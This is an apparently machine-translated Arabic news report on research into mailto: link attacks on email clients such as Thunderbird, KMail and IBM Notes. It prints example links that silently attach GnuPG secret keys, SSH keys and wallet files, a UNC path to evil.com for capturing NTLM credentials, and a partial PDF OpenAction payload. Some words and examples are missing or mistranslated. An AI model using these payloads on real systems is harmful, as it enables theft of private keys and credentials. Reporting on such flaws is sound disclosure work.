باحثون من جامعة الرور بوخوم (ألمانيا) () سلوك عملاء البريد عند معالجة روابط "mailto:" ذات المعلمات المتقدمة. كان خمسة من عملاء البريد الإلكتروني العشرين الذين تم فحصهم عرضة للهجوم الذي تلاعب باستبدال الموارد باستخدام المعلمة "إرفاق". كان ستة عملاء بريد إلكتروني إضافيين عرضة لهجوم استبدال مفتاح PGP وS/MIME، وكان ثلاثة عملاء عرضة لهجوم لاستخراج محتويات الرسائل المشفرة.
روابط «"تُستخدم لأتمتة عملية فتح عميل البريد الإلكتروني لكتابة رسالة إلى المرسل إليه المحدد في الرابط. بالإضافة إلى العنوان، يمكنك تحديد معلمات إضافية كجزء من الرابط، مثل موضوع الرسالة ونموذج للمحتوى النموذجي. يتلاعب الهجوم المقترح بمعلمة "الإرفاق"، التي تسمح لك بإرفاق مرفق بالرسالة التي تم إنشاؤها.
كان عملاء البريد Thunderbird وGNOME Evolution (CVE-2020-11879) وKDE KMail (CVE-2020-11880) وIBM/HCL Notes (CVE-2020-4089) وPegasus Mail عرضة لهجوم بسيط يسمح لك بإرفاق البريد تلقائيًا أي ملف محلي، يتم تحديده عبر رابط مثل "mailto:?attach=path_to_file". يتم إرفاق الملف دون عرض تحذير، لذلك بدون اهتمام خاص، قد لا يلاحظ المستخدم أنه سيتم إرسال الرسالة مع مرفق.
على سبيل المثال، باستخدام رابط مثل "mailto:[البريد الإلكتروني محمي]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" يمكنك إدراج مفاتيح خاصة من GnuPG في الرسالة. يمكنك أيضًا إرسال محتويات محافظ العملات المشفرة (~/.bitcoin/wallet.dat)، ومفاتيح SSH (~/.ssh/id_rsa) وأي ملفات يمكن للمستخدم الوصول إليها. علاوة على ذلك، يسمح لك Thunderbird بإرفاق مجموعات من الملفات عن طريق القناع باستخدام بنيات مثل "attach=/tmp/*.txt".
بالإضافة إلى الملفات المحلية، يقوم بعض عملاء البريد الإلكتروني بمعالجة الروابط إلى مساحة تخزين الشبكة والمسارات في خادم IMAP. على وجه الخصوص، يتيح لك IBM Notes نقل ملف من دليل الشبكة عند معالجة روابط مثل "attach=\\evil.com\dummyfile"، بالإضافة إلى اعتراض معلمات مصادقة NTLM عن طريق إرسال رابط إلى خادم SMB يتحكم فيه المهاجم (سيتم إرسال الطلب مع مستخدم معلمات المصادقة الحالية).
يعالج Thunderbird طلبات مثل "attach=imap:///fetch>UID>/INBOX>1/" بنجاح، مما يسمح لك بإرفاق محتوى من المجلدات الموجودة على خادم IMAP. وفي الوقت نفسه، يتم فك تشفير الرسائل المستردة من IMAP، والمشفرة عبر OpenPGP وS/MIME، تلقائيًا بواسطة عميل البريد قبل إرسالها. كان مطورو Thunderbird حول المشكلة في فبراير وفي هذه القضية تم حل المشكلة بالفعل (تظل فروع Thunderbird 52 و60 و68 عرضة للخطر).
كانت الإصدارات القديمة من Thunderbird أيضًا عرضة لنوعين آخرين من الهجمات على PGP وS/MIME التي اقترحها الباحثون. على وجه الخصوص، تعرض Thunderbird، بالإضافة إلى OutLook وPostBox وeM Client وMailMate وR2Mail2، لهجوم استبدال المفتاح، بسبب حقيقة أن عميل البريد يقوم تلقائيًا باستيراد وتثبيت الشهادات الجديدة المرسلة في رسائل S/MIME، مما يسمح المهاجم لتنظيم استبدال المفاتيح العامة المخزنة بالفعل من قبل المستخدم.
الهجوم الثاني، الذي يتعرض له كل من Thunderbird وPostBox وMailMate، يتلاعب بميزات آلية الحفظ التلقائي لمسودات الرسائل ويسمح، باستخدام معلمات mailto، ببدء فك تشفير الرسائل المشفرة أو إضافة توقيع رقمي للرسائل العشوائية، مع الإرسال اللاحق للنتيجة إلى خادم IMAP الخاص بالمهاجم. في هذا الهجوم، يتم إرسال النص المشفر من خلال معلمة "النص الأساسي"، ويتم استخدام علامة "تحديث التعريف" لبدء اتصال بخادم IMAP الخاص بالمهاجم. على سبيل المثال: ' '
لمعالجة روابط "mailto:" تلقائيًا دون تدخل المستخدم، يمكن استخدام مستندات PDF مصممة خصيصًا - يتيح لك إجراء OpenAction في PDF تشغيل معالج mailto تلقائيًا عند فتح مستند:
%PDF-1.5
1 0 كائن
<< /اكتب /كتالوج /OpenAction [2 0 R] >>
إندوبج
2 0 كائن
<< /النوع /الإجراء /S /URI/URI (mailto:?body=——بدء رسالة PGP ——[…])>>
إندوبج
المصدر: opennet.ru